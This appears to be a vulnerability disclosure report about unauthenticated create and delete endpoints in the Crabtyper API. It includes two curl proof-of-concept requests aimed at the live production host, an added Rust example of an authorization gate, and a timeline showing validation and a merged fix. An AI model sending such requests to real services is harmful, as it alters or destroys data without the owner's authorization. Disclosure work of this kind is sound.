Improper Access Control in Crabtyper API in brancobruyneel/crabtyper

Status: Valid

Reported on: Jun 16th 2022

Description

The Crabtyper API allows any unauthenticated client to create languages and snippets, and to delete them. A malicious actor can therefore insert offensive snippets that will be served to every user of the typing app, and anyone can take the service down entirely by deleting all snippets.

The root cause is that the API enforces no access control on these endpoints: the create and delete routes accept requests without any authentication or authorization check, so a plain HTTP request with no credentials is enough.

Proof of Concept

Create a language (no credentials supplied; a 2xx response confirms the write succeeded):

$ curl -X POST -H "Content-Type: application/json" https://crabtyper-api.azurewebsites.net/api/languages -d '{"name":"example"}'

Delete a snippet by its ID, again with no credentials:

$ curl -X DELETE https://crabtyper-api.azurewebsites.net/api/snippets/4a917fe1-ed65-4134-b8de-423023970ac9

These are only two examples; snippets can also be created in the same way, without credentials. After a fix, the same unauthenticated requests should be rejected with 401 or 403 rather than acted on.
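The report describes handlers that perform the write with no check at all. Below is an added example of the gate a fix needs, written here as illustration and not taken from the crabtyper repository or its fix commit. It assumes Rust as the project's language, a framework-agnostic `authorize` function that the server's middleware would call before a handler runs, read-only access to the snippet and language collections staying public (the typing app needs it), and a hypothetical bearer token `ADMIN_TOKEN` for mutating requests. The PoC requests from the report are replayed against it in `main`.

```rust
// Added example, not crabtyper's code: deny-by-default authorization for the
// two resource types named in the report. GET/HEAD on /api/languages and
// /api/snippets stay public; every mutating method needs a valid bearer token.
// ADMIN_TOKEN is a hypothetical value; a real server reads it from config.

#[derive(Debug, PartialEq)]
pub enum Decision {
    Allow,
    Unauthorized,     // 401: missing or invalid credentials
    MethodNotAllowed, // 405: method the collection does not support
    NotFound,         // 404: route outside the managed collections
}

/// Hypothetical admin token (assumption for the example).
pub const ADMIN_TOKEN: &str = "example-admin-token-change-me";

/// Constant-time byte comparison: the loop touches every byte regardless of
/// where the first mismatch is, so response timing does not leak the token.
fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    a.iter().zip(b).fold(0u8, |acc, (x, y)| acc | (x ^ y)) == 0
}

/// True only for "Authorization: Bearer <ADMIN_TOKEN>".
fn is_admin(auth_header: Option<&str>) -> bool {
    match auth_header.and_then(|h| h.strip_prefix("Bearer ")) {
        Some(tok) => ct_eq(tok.as_bytes(), ADMIN_TOKEN.as_bytes()),
        None => false,
    }
}

/// The collections and item routes the report covers.
fn is_managed_path(path: &str) -> bool {
    let p = path.trim_end_matches('/');
    p == "/api/languages"
        || p == "/api/snippets"
        || p.starts_with("/api/languages/")
        || p.starts_with("/api/snippets/")
}

/// Decide before the handler runs. Anything not explicitly allowed is denied.
pub fn authorize(method: &str, path: &str, auth_header: Option<&str>) -> Decision {
    if !is_managed_path(path) {
        return Decision::NotFound;
    }
    match method.to_ascii_uppercase().as_str() {
        "GET" | "HEAD" => Decision::Allow,
        "POST" | "PUT" | "PATCH" | "DELETE" => {
            if is_admin(auth_header) {
                Decision::Allow
            } else {
                Decision::Unauthorized
            }
        }
        _ => Decision::MethodNotAllowed,
    }
}

fn main() {
    // Replay the two PoC requests from the report, exactly as sent: no credentials.
    let poc: [(&str, &str, Option<&str>); 2] = [
        ("POST", "/api/languages", None),
        ("DELETE", "/api/snippets/4a917fe1-ed65-4134-b8de-423023970ac9", None),
    ];
    for (m, p, a) in poc.iter() {
        println!("{} {} -> {:?}", m, p, authorize(m, p, *a));
    }
}
```

The policy is written as a whitelist of methods per collection so that a new mutating verb added later is denied until someone deliberately lists it; the original failure mode (a route reachable with no check) cannot recur silently. Token comparison is constant-time because a plain `==` on a secret short-circuits at the first differing byte.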

Impact

An unauthenticated attacker can display arbitrary text to every user of the service and can stop the service from operating by deleting all snippets.

We are processing your report and will contact the brancobruyneel/crabtyper team within 24 hours. 9 days ago
William (Researcher), 9 days ago:


Update: looks like someone has already exploited this - needs to be fixed ASAP!

We created a GitHub Issue asking the maintainers to create a SECURITY.md 8 days ago
We have contacted a member of the brancobruyneel/crabtyper team and are waiting to hear back 8 days ago
brancobruyneel validated this vulnerability 7 days ago
William Henderson has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
brancobruyneel confirmed that a fix has been merged on 5022f4 7 days ago
The fix bounty has been dropped